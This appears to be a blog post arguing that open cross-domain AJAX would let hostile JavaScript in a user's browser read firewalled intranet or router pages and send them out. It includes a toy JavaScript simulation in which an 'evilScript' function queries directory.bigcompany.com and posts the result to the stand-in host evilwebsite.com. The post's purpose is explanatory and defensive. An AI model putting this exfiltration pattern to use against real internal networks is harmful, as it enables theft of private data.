Cross Domain AJAX

AJAX is all the rage, but it can’t do everything people want it to do. For example, AJAX code served by one site can’t read the responses of another site: the browser’s same-origin policy stops it. The limitation exists for security reasons, but recently Lucas Carlson set out to debunk cross-domain AJAX security myths.

Lucas Carlson does a good job of debunking some of the claimed security problems of AJAX, but he makes one big mistake in saying: “Cross-domain Ajax does not introduce any new security concerns.”

The major exception is intranets, combined with Javascript’s ability to send data back to the server it came from. Imagine you know that bigcompany.com runs an internal web-based directory system called directory.bigcompany.com. Naturally, this directory server is reachable only from the internal network at bigcompany.com. If Javascript could read cross-domain responses, then the following scenario becomes possible:

  1. Bob@bigcompany unknowingly downloads the evil JS code from evilwebsite.com.
  2. The evil JS code runs a cross-domain AJAX query to directory.bigcompany.com, which it can now do because it’s running inside the firewall, in Bob’s browser.
  3. The JS code then packages up the resulting directory information and ships it back to evilwebsite.com.

Taken to its logical extreme, cross-domain AJAX means that anyone surfing from behind a firewall might become an unwilling proxy for a remote attacker, letting that attacker browse the web as if he were inside the firewall. Sure, it would be better if all internal services were password-protected, but the fact remains that this is a totally different game once evil code can query within the firewall and surreptitiously send what it finds back to its originating server.

Unless I’m missing something radical about HTML and Javascript, this is something new that cross-domain AJAX would enable. Yes, Javascript can already “hit” any cross-domain URL with tricks like images or iframes, but it can’t do anything real with those hits: it can’t read the response, process its contents, or send that content back to the originating server. Adding that ability would radically change the game, and it’s an enormous risk.
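To make the “hit” versus “read” distinction concrete, here is a toy model of the three-step scenario above. It is an added example, my own code and not anything from Lucas’s post or from a real browser: a fake network records every request, and a minimal AJAX function hands the response back to the script only when the host matches the page’s origin or when a hypothetical open cross-domain policy is switched on. The hostnames are the ones from the scenario; the directory listing is made up.

```javascript
'use strict';

// Constructed sample data: what each host would answer. The hostnames are
// the ones used in the scenario above; the directory listing is made up.
const SERVERS = {
  'directory.bigcompany.com': 'Alice Smith, ext 1234\nBob Jones, ext 5678\n',
  'evilwebsite.com': 'OK',
};

// A toy network that records every request, so we can see which hosts were
// "hit" and what, if anything, was posted back to the attacker.
function makeNetwork() {
  const log = [];
  return {
    log,
    send(host, body) {
      log.push({ host, body });
      return SERVERS[host];
    },
  };
}

// A minimal model of an AJAX call from a page served by pageOrigin. The
// request always goes out (that is the "hit"), but the script only gets the
// response bytes if the host is the page's own origin or the hypothetical
// open cross-domain policy is on.
function makeAjax(network, pageOrigin, allowCrossDomainRead) {
  return function ajax(host, body) {
    const response = network.send(host, body);
    if (host === pageOrigin || allowCrossDomainRead) {
      return response;
    }
    return null; // request was sent, but the response is opaque to the script
  };
}

// Steps 2 and 3 of the scenario, as the evil script would write them: query
// the intranet directory, then ship whatever came back to evilwebsite.com.
function evilScript(ajax) {
  const stolen = ajax('directory.bigcompany.com', '');
  ajax('evilwebsite.com', stolen === null ? '' : stolen);
  return stolen;
}

// Run the scenario under one policy and report what the attacker ended up with.
function runScenario(allowCrossDomainRead) {
  const network = makeNetwork();
  const ajax = makeAjax(network, 'evilwebsite.com', allowCrossDomainRead);
  const stolen = evilScript(ajax);
  const exfil = network.log.find((r) => r.host === 'evilwebsite.com');
  return {
    stolen,
    exfiltrated: exfil ? exfil.body : '',
    hits: network.log.map((r) => r.host),
  };
}

console.log('same-origin policy:', runScenario(false));
console.log('open cross-domain: ', runScenario(true));
```

Under the same-origin policy the directory server is still hit (both runs log the same two hosts), but the script gets `null` and the body posted back to evilwebsite.com is empty. Flip the policy and the full directory listing leaves the firewall. That one flag is the entire difference between today’s “hit but can’t read” and the open cross-domain AJAX Lucas is arguing for.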

Lucas should correct his post, especially since the rest of his article is good and correctly debunks other security fears.

UPDATE: Lucas has apparently posted a response in the comments that acknowledges this very issue, which was brought up by another reader. Unfortunately, Lucas downplays it, thinking it’s “not a big deal.” It is a big deal. If cross-domain AJAX were deployed, you can bet that corporate systems would filter out all Javascript. They don’t have a firewall up for nothing. And if users within corporate firewalls have Javascript disabled, bye bye web 2.0.

Not to mention, this isn’t just about companies. Everyone at home is basically on a firewalled network if they have a router. Is it okay for Javascript to be able to surreptitiously hit the internal administration page of your router and report back any data it finds? Or your small internal development web server? This is not a niche issue, and it’s the major reason why totally open cross-domain AJAX cannot and will not happen.